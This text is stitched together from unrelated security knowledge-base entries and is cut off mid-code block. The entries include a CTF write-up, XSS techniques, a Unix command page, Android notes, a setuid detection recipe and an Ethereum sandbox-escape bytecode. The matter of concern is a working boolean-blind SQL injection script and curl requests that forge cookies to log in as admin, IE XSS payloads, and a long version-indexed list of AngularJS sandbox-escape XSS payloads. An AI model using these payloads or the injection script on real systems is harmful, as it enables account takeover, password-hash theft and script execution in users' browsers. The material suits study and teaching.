,$sql); if(!$result) { //something went wrong, display the error echo 'Something went wrong while registering. Please try again later.'; echo mysqli_error($conn); //debugging purposes, uncomment when needed } else { echo 'Successfully registered. You can now <a href="signin.php">sign in</a> and start posting! :-)'; } ``` The main point here is that the password is saved as a SHA1 hash in the database. In `signin.php`, after performing basic checks for the username and password, the application performs the following: ```php //the form has been posted without errors, so save it //notice the use of mysql_real_escape_string, keep everything safe! //also notice the sha1 function which hashes the password $sql = "SELECT user_id, user_name, user_pass, user_level FROM users WHERE user_name = '" . mysqli_real_escape_string($conn, $_POST['user_name']) . "' AND user_pass = '" . sha1($_POST['user_pass']) . "'"; $result = mysqli_query($conn, $sql); if(!$result) { //something went wrong, display the error echo 'Something went wrong while signing in. Please try again later.'; //echo mysql_error(); //debugging purposes, uncomment when needed } else { //the query was successfully executed, there are 2 possibilities //1. the query returned data, the user can be signed in //2. the query returned an empty result set, the credentials were wrong if(mysqli_num_rows($result) == 0) { echo 'You have supplied a wrong user/password combination. Please try again.'; } else { //we put the user_id, user_name and user_pass values in cookies, so we can use it at various pages while($row = mysqli_fetch_assoc($result)) { setcookie('user_id', $row['user_id']); setcookie('user_name', $row['user_name']); setcookie('user_pass', $row['user_pass']); echo 'Welcome, ' . $row['user_name'] . '. <a href="index.php">Proceed to the forum overview</a>.'; } } } ``` It searches for a user with a matching username and password, and if found - saves the user ID, username and hash of the password to a cookie. Later, when accessing any page, `header.php` decides if the user is logged in by comparing the cookies to the DB: ```php $user = null; if(isset($_COOKIE['user_id'], $_COOKIE['user_name'], $_COOKIE['user_pass'])) { $sql = "SELECT user_id, user_name, user_level FROM users WHERE user_id = " . mysqli_real_escape_string($conn, $_COOKIE['user_id']) . " AND user_name = '" . mysqli_real_escape_string($conn, $_COOKIE['user_name']) . "' AND user_pass = '" . mysqli_real_escape_string($conn, $_COOKIE['user_pass']) . "'"; $result = mysqli_query($conn, $sql); if($result) { //we also put the user_id and user_name values in the $user, so we can use it at various pages while($row = mysqli_fetch_assoc($result)) { $user = array(); $user['user_id'] = $row['user_id']; $user['user_name'] = $row['user_name']; $user['user_level'] = $row['user_level']; } } } if($user) { echo 'Hello ' . $user['user_name'] . '! Not you? <a href="signout.php">Sign out</a>'; } else { echo '<a href="signin.php">Sign in</a> or <a href="signup.php">create an account</a>.'; } ``` We can see that all DB access is sanitized using `mysqli_real_escape_string` (or `sha1`), and yet an injection is still possible! The faulty code is: ```sql SELECT user_id, user_name, user_level FROM users WHERE user_id = " . mysqli_real_escape_string($conn, $_COOKIE['user_id']) . " AND user_name = '" . mysqli_real_escape_string($conn, $_COOKIE['user_name']) . "' AND user_pass = '" . mysqli_real_escape_string($conn, $_COOKIE['user_pass']) . "'"; ``` Notice how the user id (which is expected to be an integer) is not surrounded by quotes. `mysqli_real_escape_string` just sanitizes `NUL (ASCII 0), \n, \r, \, ', ", Control-Z`, meaning we can enter anything else and refactor the SQL query without being detected. The first thing that came to mind was to comment out the rest of the query by setting the `user_id` cookie value to `"100 --"`. This should produce the following query: ```sql SELECT user_id, user_name, user_level FROM users WHERE user_id = 100 -- AND user_name = 'my_user' AND user_pass = 'my_pass'"; ``` However, this didn't work, and other comment styles didn't affect the query either. Another strategy would be to rewrite the query by taking advantage of MySQL's operator precedence and OR short-circuit evaluation. MySQL evaluations OR operators after finishing evaluating AND operators. So a query such as `SELECT true OR false AND false;` would return `true` since first the engine evaluates `false AND false` to `false` and then `true or false` to `true`. In our example, this would map to setting the `user_id` cookie to `"100 or user_id = 9999"`, creating a query of: ```sql SELECT user_id, user_name, user_level FROM users WHERE user_id = 100 or user_id = 9999 AND user_name = 'my_user' AND user_pass = 'my_pass'"; ``` Such a query should return the user entry for the user with ID `100` regardless of the password. Let's try it: ```console root@kali:/media/sf_CTFs/technion/High_School_Project# curl 'http://ctf.cs.technion.ac.il:4010/' -H "Cookie: user_id=100 or user_id = 9999 ; user_name=a; user_pass=a" -s | grep "Sign out" Hello 5845653! Not you? <a href="signout.php">Sign out</a> </div> ``` We can see that the forum has identified us as the user with username `5845653` even without entering a password. The next thing we'd like to do is search for the admin account: ```console root@kali:/media/sf_CTFs/technion/High_School_Project# for i in {0..10}; do echo $i; curl 'http://ctf.cs.technion.ac.il:4010/' -H "Cookie: user_id=$i or user_id = 99 99 ; user_name=a; user_pass=a" -s | grep "Sign out" && echo; done 0 1 2 3 4 Hello admin! Not you? <a href="signout.php">Sign out</a> </div> 5 6 Hello admin1! Not you? <a href="signout.php">Sign out</a> </div> 7 8 Hello admin2! Not you? <a href="signout.php">Sign out</a> </div> 9 Hello DuckyDebugDuck! Not you? <a href="signout.php">Sign out</a> </div> 10 Hello hey! Not you? <a href="signout.php">Sign out</a> </div> ``` We can see that the administrator has received user ID #4. We should now be able to visit the forum under his user and read his secrets. ```console root@kali:/media/sf_CTFs/technion/High_School_Project# curl 'http://ctf.cs.technion.ac.il:4010/topic.php?id=1' -H "Cookie: user_id=4 or user_id = 9999 ; user_name=a; user_pass=a" -s | head -n 35 <!doctype html> <html> <head> <title>Online Forum Project DSW</title> <link rel="stylesheet" href="style.css"> <link rel="shortcut icon" href="favicon.ico"> </head> <body> <h1> Online Forum</h1> <div id="wrapper"> <div id="menu"> <a class="item" href="index.php"> Home </a> <a class="item" href="create_topic.php"> Create a topic</a> <a class="item" href="create_cat.php"> Create a category</a> </div> <div id="userbar"> <div id="userbar"> Hello admin! Not you? <a href="signout.php">Sign out</a> </div> </div> <div id="content"> <h2>Posts in Flag topic</h2><table border="1"> <tr> <th>Post</th> <th>Date and user name</th> </tr><tr><td class="leftpart">import hashlib<br> password = input('Insert admin password: ')<br> x1 = hashlib.sha1(password.encode()).hexdigest()<br> x2 = hashlib.sha1(x1.encode()).hexdigest()[:10]<br> print('The flag is: cstechnion{A1m0$7_$3cUR3_' + x2 + '}')</td><td class="rightpart">23-11-2020<br>admin</td></tr><tr><td class="leftpart">a</td><td class="rightpart">23-11-2020<br>y</td></tr><tr><td class="leftpart">test2</td><td class="rightpart">23-11-2020<br>revivo</td></tr><tr><td class="leftpart"></td><td class="rightpart">23-11-2020<br>user</td></tr><tr><td class="leftpart">yo send me the flag :(</td><td class="rightpart">23-11-2020<br>user</td></tr><tr><td class="leftpart">WOOHOOO</td><td class="rightpart">24-11-2020<br>matan4</td></tr><tr><td class="leftpart"></td><td class="rightpart">24-11-2020<br>admin3</td></tr><tr><td class="leftpart"></td><td class="rightpart">24-11-2020<br>admin3</td></tr><tr><td class="leftpart">asdasdaxzczc</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">asdasdaxzczc</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart"></td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">flag?</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">flag?</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">flag?</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">got the flag lol YEET</td><td class="rightpart">25-11-2020<br>admin</td></tr><tr><td class="leftpart">nice flag</td><td class="rightpart">26-11-2020<br>admin</td></tr><tr><td class="leftpart">Nice Flag!</td<br> class="rightpart">26-11-2020<br>admin</td></tr><tr><td class="leftpart">According to all known laws ``` Between a lot of fake messages written by (probably) other participants which were able to login as admin, we see the following message: ``` password = input('Insert admin password: ')<br> x1 = hashlib.sha1(password.encode()).hexdigest()<br> x2 = hashlib.sha1(x1.encode()).hexdigest()[:10]<br> print('The flag is: cstechnion{A1m0$7_$3cUR3_' + x2 + '}') ``` So, we need to somehow extract the admin's password. We can turn our SQL injection into a boolean-blind injection and brute-force the password (or the password's hash, to be exact) character after character. This means that for each character in the `user_pass` field, we craft a query so that the user will be logged in only if the query is true. Something like this: ```sql SELECT user_id, user_name, user_level FROM users WHERE user_id = 4 and /*n-th character of user_pass is x*/ or user_id = 9999 AND user_name = 'my_user' AND user_pass = 'my_pass'"; ``` For each index in the `user_password` string, we can try all possible characters until we see the user being welcomed as logged in. That's when we know we found the correct character. Usually this is done by injecting a query such as `and substring(user_pass,/*index*/,1) = char(/*current_character*/)`. This should work but will require us to iterate over all possible characters for each index (in the worst case). It's not too bad in our case since we know that the field contains a hex string, so characters are limited to `[0-9a-f]`, but just for fun we'll use a slightly different method to recover each character in a constant number of queries: We'll just extract each character by performing 7 queries to identify each bit in the character (ASCII characters always have the eighth bit zeroed). The code: ```python from pwn import * import requests BITS_IN_BYTE = 8 PASSWORD_FIELD_LEN = 20*2 # SHA1 hash -> 20 bytes, each byte is printed as two characters ADMIN_USER_ID = 4 def inject_query(query): cookies = { "user_id": query, "user_name": "name", "user_pass": "pass" } r = requests.get("http://ctf.cs.technion.ac.il:4010/", cookies=cookies) return 'Not you? <a href="signout.php">Sign out</a>' in r.text def leak_user_pass_character(user_id, index): byte = 0 for i in range(BITS_IN_BYTE): bit_mask = (1 << i) is_bit_set = inject_query(f"{user_id} and ord(substring(user_pass,{index+1},1))&{bit_mask}={bit_mask} or FALSE ") byte |= (is_bit_set << i) return chr(byte) def leak_password(user_id): password = "" with log.progress(f'Leaking password field for user {user_id}') as p: for i in range(PASSWORD_FIELD_LEN): p.status(f"Processing index {i}, recovered '{password}' so far...") new_char = leak_user_pass_character(user_id, i) password += new_char return password admin_pass = leak_password(ADMIN_USER_ID) log.success(f"Admin password: {admin_pass}") ``` Output: ```console root@kali:/media/sf_CTFs/technion/High_School_Project# python3 solve.py [+] Leaking password field for user 4: Done [+] Admin password: eef2c983660a888d1c23703ab1aef09f65d90edb ``` We can double check our result by trying to access a page using these values: ```console root@kali:/media/sf_CTFs/technion/High_School_Project# curl 'http://ctf.cs.technion.ac.il:4010/topic.php?id=1' -H "Cookie: user_id=4; user_name=admin; user_pass=eef2 c983660a888d1c23703ab1aef09f65d90edb" -s | grep "Sign out" Hello admin! Not you? <a href="signout.php">Sign out</a> </div> ``` The last part is constructing the flag according to the instructions we got: ```python >>> import hashlib >>> x1 = "eef2c983660a888d1c23703ab1aef09f65d90edb" >>> x2 = hashlib.sha1(x1.encode()).hexdigest()[:10] >>> print('The flag is: cstechnion{A1m0$7_$3cUR3_' + x2 + '}') The flag is: cstechnion{A1m0$7_$3cUR3_ee51f2a8c6} ``` Notice that we don't know the admin's password, but we do have the SHA1 of the password which is enough to get the flag.
sec-knowleage
# XSS with Relative Path Overwrite - IE 8/9 and lower You need these 3 components ```javascript 1) stored XSS that allows CSS injection. : {}*{xss:expression(open(alert(1)))} 2) URL Rewriting. 3) Relative addressing to CSS style sheet : ../style.css ``` A little example ```html http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE] <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" /> </head> <body> Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))} </body> </html> ``` Explanation of the vulnerability > The Meta element forces IE’s document mode into IE7 compatible which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))is included on the page and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use “open” to prevent client side DoS with repeated executions of alert. > A simple request of “rpo.php/” makes the relative style load the page itself as a style sheet. The actual request is “/labs/xss_horror_show/chapter7/rpo.php/styles.css” the browser thinks there’s another directory but the actual request is being sent to the document and that in essence is how an RPO attack works. Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php` Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3` MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php` From : `http://www.thespanner.co.uk/2014/03/21/rpo/` ## Mutated XSS for Browser IE8/IE9 ```javascript <listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing> <script>alert(document.getElementById('x').innerHTML)</script> ``` IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. ## References - [TODO](TODO)
sec-knowleage
unarj === 解压缩由arj命令创建的压缩包 ## 补充说明 **unarj命令** 用来解压缩由arj命令创建的压缩包。 ### 语法 ```shell unarj(选项)(参数) ``` ### 选项 ```shell e:解压缩.arj文件; l:显示压缩文件内所包含的文件; t:检查压缩文件是否正确; x:解压缩时保留原有的路径。 ``` ### 参数 .arj压缩包:指定要解压缩的.arj压缩包。
sec-knowleage
# Android 应用运行机制简述 本部分主要关注 Android 中 Java 层代码与 Native 层代码的基本运行原理。 一般而言,在启动一个 App 时,Android 会首先执行 Application 类(AndroidManifest.xml 文件中注明)的创建工作,然后再开始执行 Main Activity,继而根据各种各样的逻辑执行相关代码。 注:本部分的内容可能存在以下问题 - 简略 - 理解不到位 如果发现可以补充的地方,欢迎随时及时补充。当然,本部分内容也会随着时间不断更新。
sec-knowleage
# Plaid CTF 2017 Team: nazywam, ppr, psrok1, c7f.m0d3, cr019283, shalom ## Table of contents * [Logarithms are hard (misc)](logarithms) * [Multicast (crypto)](multicast) * [BB-8 (crypto)](bb8) * [SHA-4 (web/crypto)](sha4) * [Pykemon (web)](pykemon)
sec-knowleage
## Catch Me if You Can (Forensics, 100points) tl;dr concact even and odd data packets and read the flag from the table Download [usb.pcap](usb.pcap), load it into wireshark. There is some data being sent(I don't know what is actually going on, you can tell me, I'd love to find out :). `Leftover Captue Data` hold the raw data we want, filter the packets and the export them in order. There are 22 files, `file` and `du` commands are extremly helpful here: ![alt](scr1.png) 2 beginnings and 2 cut-offs, so we are now 99% sure that there are only 2 files being sent and maybe they are in order? After noticing some intersecting texts and images that connect for example, `1-3-5` we try concacting odd files and even files together. We're left with [even.ods](even.ods) and [odd.ods](odd.ods) odd.ods has an interesting table in it: ![alt](scr2.png) It looks like a lookup table, so now we have to find the second half of the message. After unpacking odd.ods we spot an interesting hex string in `content.xml`: `g6d5g5f2b6g5d3e4d4b3c5b6k2j5j5g4l2` If we now use it with the lookup table we get: `ndh[wh3re1sw@lly]` Bingo! * Fun fact, the hex string is actually in the spreadsheet in the bottom right corner ;)
sec-knowleage
# T1548-001-linux-Setuid and Setgid ## 来自ATT&CK的描述 攻击者可以使用setuid或setgid位执行shell转义或利用应用程序中的漏洞来获取在不同用户上下文中运行的代码。在Linux或macOS上,当为应用程序设置了setuid或setgid位时,该应用程序将分别以拥有用户或组的特权运行。通常,应用程序是在当前用户的上下文中运行的,而不管哪个用户或组拥有该应用程序。但是,在某些情况下,需要在提升权限的上下文中执行程序才能正常运行,但运行它们的用户不需要提升权限。 任何用户都可以为自己的应用程序设置setuid或setgid标志,而不必在sudoers文件中创建条目(必须由root用户完成)。通过查看文件属性时,这些位用“s”而不是“x”表示ls -l。该chmod程序能够经由bitmasking设置这些位与,chmod 4777 [file]或通过速记命名,chmod u+s [file]。 攻击者可以对自己的恶意软件使用此机制,以确保他们将来能够在提升的环境中执行。 ### 关于Setuid and Setgid详解 文件权限的机制是Linux系统的一大特色,对于初学Linux的人对可读(r)、可写(w)、可执行(x)这都是比较基本的权限。一个文件的权限有十个位,分为三组来表示。第一个位为一组,表示文件的类型: -:表示一般文件 d:表示目录文件 l:表示链接文件 b:表示块设备 c:表示字符设备 p:表示管道 s:表示套接字 但是Linux还有三个比较特殊的权限,分别是:setuid,setgid,stick bit (粘滞位)。 setuid: 设置使文件在执行阶段具有文件所有者的权限. 典型的文件是 /usr/bin/passwd. 如果一般用户执行该文件, 则在执行过程中, 该文件可以获得root权限, 从而可以更改用户的密码。 setgid: 该权限只对目录有效. 目录被设置该位后, 任何用户在此目录下创建的文件都具有和该目录所属的组相同的组。 stick bit: 该位可以理解为防删除位. 一个文件是否可以被某用户删除, 主要取决于该文件所属的组是否对该用户具有写权限. 如果没有写权限, 则这个目录下的所有文件都不能被删除, 同时也不能添加新的文件. 如果希望用户能够添加文件但同时不能删除文件, 则可以对文件使用stick bit位. 设置该位后, 就算用户对目录具有写权限, 也不能删除该文件。 ## 测试案例 操作这些标志与操作文件权限的命令是一样的, 都是 chmod. 有两种方法来操作: ### 方法一 chmod u+s xxx # 设置setuid权限,加上setuid标志(setuid 只对文件有效) chmod g+s xxx # 设置setgid权限,加上setgid标志 (setgid 只对目录有效) chmod o+t xxx # 设置stick bit权限,针对目录 ### 方法二 采用八进制方式. 对一般文件通过三组八进制数字来置标志, 如 666, 777, 644等. 如果设置这些特殊标志, 则在这组 数字之外外加一组八进制数字. 如4666, 2777等 chmod 4775 xxx # 设置setuid权限 chmod 2775 xxx # 设置setgid权限 chmod 1775 xxx # 设置stick bit权限,针对目录 在这里只讲第一位8进制代表权限 0: 不设置特殊权限 1:只设置sticky 2:只设置SGID 3:只设置SGID和sticky 4:只设置SUID 5:只设置SUID和sticky 6:只设置SUID和SGID 7:设置3种权限 设置完这些标志后, 可以用 ls -l 来查看. 如果有这些标志, 则会在原来的执行标志位置上显示。那么原来的执行标志x到哪里去了呢? 系统是这样规定的, 如果本来在该位上有x, 则这些特殊标志显示为小写字母 (s, s, t). 否则, 显示为大写字母 (S, S, T)。 注:在UNIX系统家族里,文件或目录权限的控制分别以读取,写入,执行3种一般权限来区分,另有3种特殊权限 可供运用,再搭配拥有者与所属群组管理权限范围。您可以使用chmod指令去变更文件与目录的权限,设置方式 采用文字或数字代号皆可。符号连接的权限无法变更,如果您对符号连接修改权限,其改变会作用在被连接的原始 文件。权限范围的表示法如下:   u:User,即文件或目录的拥有者。   g:Group,即文件或目录的所属群组。   o:Other,除了文件或目录拥有者或所属群组之外,其他用户皆属于这个范围。   a:All,即全部的用户,包含拥有者,所属群组以及其他用户。   有关权限代号的部分,列表于下:   r:读取权限,数字代号为"4"。   w:写入权限,数字代号为"2"。   x:执行或切换权限,数字代号为"1"。   -:不具任何权限,数字代号为"0"。   s:特殊?b>功能说明:变更文件或目录的权限。 ## 检测日志 bash历史记录 ## 测试复现 ### 方法一/ icbc@icbc:/hacker$ ls -l -rw-r--r-- 1 root root 0 7月 19 17:22 bas.txt icbc@icbc:/hacker$ sudo chmod u+s bas.txt icbc@icbc:/hacker$ ls -l -rwSr--r-- 1 root root 0 7月 19 17:22 bas.txt icbc@icbc:/hacker$ sudo chmod g+s bas.txt icbc@icbc:/hacker$ ls -l -rwSr-Sr-- 1 root root 0 7月 19 17:22 bas.txt ### 方法二/ icbc@icbc:/hacker$ ls -l -rwxr-xr-x 1 root root 0 8月 28 15:16 admin.txt icbc@icbc:/hacker$ sudo chmod 4777 admin.txt icbc@icbc:/hacker$ ls -l -rwsrwxrwx 1 root root 0 8月 28 15:16 admin.txt icbc@icbc:/hacker$ sudo chmod 2777 admin.txt icbc@icbc:/hacker$ ls -l -rwxrwsrwx 1 root root 0 8月 28 15:16 admin.txt ## 测试留痕 ### 方法一 / icbc@icbc:/hacker$ history 650 chmod u+s bas.txt 651 sudo chmod u+s bas.txt 652 ls -l 653 sudo chmod g+s bas.txt ### 方法二 / icbc@icbc:/hacker$ history 683 sudo chmod 4777 admin.txt 684 ls -l 685 sudo chmod 2777 admin.txt ## 检测规则/思路 splunk检测规则:index=linux sourcetype=bash_history "chmod `4***`" OR "chmod `2***`" OR "chmod u+s" OR "chmod g+s" | table host,user_name,bash_command ## 参考推荐 MITRE-ATT&CK-T1548-001 <https://attack.mitre.org/techniques/T1548/001/> linux文件特殊权限 <https://www.cnblogs.com/patriot/p/7874725.html> linux中chmod命令详解 <https://www.cnblogs.com/lianstyle/p/8571975.html> linux下的chmod参数详解 <https://blog.csdn.net/taiyang1987912/article/details/41121131>
sec-knowleage
killall === 使用进程的名称来杀死一组进程 ## 补充说明 **killall命令** 使用进程的名称来杀死进程,使用此指令可以杀死一组同名进程。我们可以使用kill命令杀死指定进程PID的进程,如果要找到我们需要杀死的进程,我们还需要在之前使用ps等命令再配合grep来查找进程,而killall把这两个过程合二为一,是一个很好用的命令。 ### 语法 ```shell killall(选项)(参数) ``` ### 选项 ```shell -e:对长名称进行精确匹配; -l:忽略大小写的不同; -p:杀死进程所属的进程组; -i:交互式杀死进程,杀死进程前需要进行确认; -l:打印所有已知信号列表; -q:如果没有进程被杀死。则不输出任何信息; -r:使用正规表达式匹配要杀死的进程名称; -s:用指定的进程号代替默认信号“SIGTERM”; -u:杀死指定用户的进程。 ``` ### 参数 进程名称:指定要杀死的进程名称。 ### 实例 ```shell # 杀死所有同名进程 killall vi # 指定向进程发送的信号 killall -9 vi # 0信号表示不向进程发送信号, 可通过返回值判断进程是否存在, 0(存在)1(不存在) killall -0 vi echo $? ```
sec-knowleage
### HTTPS相关介绍 `HTTPs = HTTP + SSL / TLS`.服务端和客户端的信息传输都会通过TLS进行加密,所以传输的数据都是加密后的数据 - [wireshark分析HTTPs](http://www.freebuf.com/articles/system/37900.html) ### HTTPS相关例题 > 题目:hack-dat-kiwi-ctf-2015:ssl-sniff-2 打开流量包发现是 `SSL` 加密过的数据,导入题目提供的`server.key.insecure`,即可解密 ```xml GET /key.html HTTP/1.1 Host: localhost HTTP/1.1 200 OK Date: Fri, 20 Nov 2015 14:16:24 GMT Server: Apache/2.4.7 (Ubuntu) Last-Modified: Fri, 20 Nov 2015 14:15:54 GMT ETag: "1c-524f98378d4e1" Accept-Ranges: bytes Content-Length: 28 Content-Type: text/html The key is 39u7v25n1jxkl123 ```
sec-knowleage
# Ethereum Opcodes Ethereum 中的 opcodes 有 142 种,部分常见的 opcodes 如下所示: | Uint8 | Mnomonic | Stack Input | Stack Output | Expression | | :---: | :------: | :--------------------: | :----------: | :----------------------------------: | | 00 | STOP | - | - | STOP() | | 01 | ADD | \| a \| b \| | \| a + b \| | a + b | | 02 | MUL | \| a \| b \| | \| a * b \| | a * b | | 03 | SUB | \| a \| b \| | \| a - b \| | a - b | | 04 | DIV | \| a \| b \| | \| a // b \| | a // b | | 51 | MLOAD | \| offset \| | \| value \| | value = memory[offset:offset+32] | | 52 | MSTORE | \| offset \| value \| | - | memory[offset:offset+32] = value | | 54 | SLOAD | \| key \| | \| value \| | value = storage[key] | | 55 | SSTORE | \| key \| value \| | - | storage[key] = value | | 56 | JUMP | \| destination \| | - | $pc = destination | | 5B | JUMPDEST | - | - | - | | F3 | RETURN | \| offset \| length \| | - | return memory[offset:offset+length] | | FD | REVERT | \| offset \| length \| | - | revert(memory[offset:offset+length]) | !!! info JUMPDEST 是跳转指令的 destination,跳转指令不能跳转到没有 JUMPDEST 的地方。 更多的详细 opcodes 信息可以查看 [ethervm.io](https://ethervm.io)。 ## 例子 以 startCTF 2021 的 StArNDBOX 一题为例讲解一下 opcodes 的题目。 本题会在部署挑战合约的时候传入 100 wei 到合约中,我们的目标是将合约的 balance 清空。题目合约的源码如下: ```solidity pragma solidity ^0.5.11; library Math { function invMod(int256 _x, int256 _pp) internal pure returns (int) { int u3 = _x; int v3 = _pp; int u1 = 1; int v1 = 0; int q = 0; while (v3 > 0){ q = u3/v3; u1= v1; v1 = u1 - v1*q; u3 = v3; v3 = u3 - v3*q; } while (u1<0){ u1 += _pp; } return u1; } function expMod(int base, int pow,int mod) internal pure returns (int res){ res = 1; if(mod > 0){ base = base % mod; for (; pow != 0; pow >>= 1) { if (pow & 1 == 1) { res = (base * res) % mod; } base = (base * base) % mod; } } return res; } function pow_mod(int base, int pow, int mod) internal pure returns (int res) { if (pow >= 0) { return expMod(base,pow,mod); } else { int inv = invMod(base,mod); return expMod(inv,abs(pow),mod); } } function isPrime(int n) internal pure returns (bool) { if (n == 2 ||n == 3 || n == 5) { return true; } else if (n % 2 ==0 && n > 1 ){ return false; } else { int d = n - 1; int s = 0; while (d & 1 != 1 && d != 0) { d >>= 1; ++s; } int a=2; int xPre; int j; int x = pow_mod(a, d, n); if (x == 1 || x == (n - 1)) { return true; } else { for (j = 0; j < s; ++j) { xPre = x; x = pow_mod(x, 2, n); if (x == n-1){ return true; }else if(x == 1){ return false; } } } return false; } } function gcd(int a, int b) internal pure returns (int) { int t = 0; if (a < b) { t = a; a = b; b = t; } while (b != 0) { t = b; b = a % b; a = t; } return a; } function abs(int num) internal pure returns (int) { if (num >= 0) { return num; } else { return (0 - num); } } } contract StArNDBOX{ using Math for int; constructor()public payable{ } modifier StAr() { require(msg.sender != tx.origin); _; } function StArNDBoX(address _addr) public payable{ uint256 size; bytes memory code; int res; assembly{ size := extcodesize(_addr) code := mload(0x40) mstore(0x40, add(code, and(add(add(size, 0x20), 0x1f), not(0x1f)))) mstore(code, size) extcodecopy(_addr, add(code, 0x20), 0, size) } for(uint256 i = 0; i < code.length; i++) { res = int(uint8(code[i])); require(res.isPrime() == true); } bool success; bytes memory _; (success, _) = _addr.delegatecall(""); require(success); } } ``` 可以看到题目的 `StArNDBoX` 函数可以获取任意地址的合约并检测该合约的每个字节是否为质数,如果通过检查则使用 `delegatecall` 来调用目标合约。 但由于该合约中的 `isPrime` 函数并不是完整的质数检查函数,`00` 和 `01` 也可以通过检查,因此我们可以构造如下的字节码: ``` // 0x6100016100016100016100016100016100650361000161fbfbf1 61 00 01 | PUSH2 0x0001 61 00 01 | PUSH2 0x0001 61 00 01 | PUSH2 0x0001 61 00 01 | PUSH2 0x0001 61 00 01 | PUSH2 0x0001 61 00 65 | PUSH2 0x0065 03 | SUB 61 00 01 | PUSH2 0x0001 61 fb fb | PUSH2 0xfbfb f1 | CALL ``` 来执行 `address(0x0001).call.gas(0xfbfb).value(0x0065 - 0x0001)` 语句,也就是将题目合约中的 balance 转到 0x1 处,从而清空 balance 满足得到 flag 的条件。 ## 题目 ### starCTF 2021 - 题目名称 StArNDBOX ### RealWorld 2019 - 题目名称 Montagy ### QWB 2020 - 题目名称 EasySandbox - 题目名称 EGM ### 华为鲲鹏计算 2020 - 题目名称 boxgame !!! note 注:题目附件相关内容可至 [ctf-challenges/blockchain](https://github.com/ctf-wiki/ctf-challenges/tree/master/blockchain) 仓库寻找。 ## 参考 - [Ethervm](https://ethervm.io) - [starCTF 2021 - StArNDBOX](https://github.com/sixstars/starctf2021/tree/main/blockchain-StArNDBOX)
sec-knowleage
# XSS in Angular and AngularJS ## Client Side Template Injection The following payloads are based on Client Side Template Injection. ### Stored/Reflected XSS - Simple alert in AngularJS > AngularJS as of version 1.6 have removed the sandbox altogether AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin) ```javascript {{constructor.constructor('alert(1)')()}} ``` AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) ```javascript {{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}} ``` Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=<brute+ng-app>%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D) AngularJS 1.6.0 by [@LewisArdern](https://twitter.com/LewisArdern/status/1055887619618471938) & [@garethheyes](https://twitter.com/garethheyes/status/1055884215131213830) ```javascript {{0[a='constructor'][a]('alert(1)')()}} {{$eval.constructor('alert(1)')()}} {{$on.constructor('alert(1)')()}} ``` AngularJS 1.5.9 - 1.5.11 by [Jan Horn](https://twitter.com/tehjh) ```javascript {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }} ``` AngularJS 1.5.0 - 1.5.8 ```javascript {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} ``` AngularJS 1.4.0 - 1.4.9 ```javascript {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} ``` AngularJS 1.3.20 ```javascript {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}} ``` AngularJS 1.3.19 ```javascript {{ 'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join; $eval('x=alert(1)//'); }} ``` AngularJS 1.3.3 - 1.3.18 ```javascript {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=[].join; $eval('x=alert(1)//'); }} ``` AngularJS 1.3.1 - 1.3.2 ```javascript {{ {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join; 'a'.constructor.prototype.charAt=''.valueOf; $eval('x=alert(1)//'); }} ``` AngularJS 1.3.0 ```javascript {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )) );}} ``` AngularJS 1.2.24 - 1.2.29 ```javascript {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}} ``` AngularJS 1.2.19 - 1.2.23 ```javascript {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}} ``` AngularJS 1.2.6 - 1.2.18 ```javascript {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}} ``` AngularJS 1.2.2 - 1.2.5 ```javascript 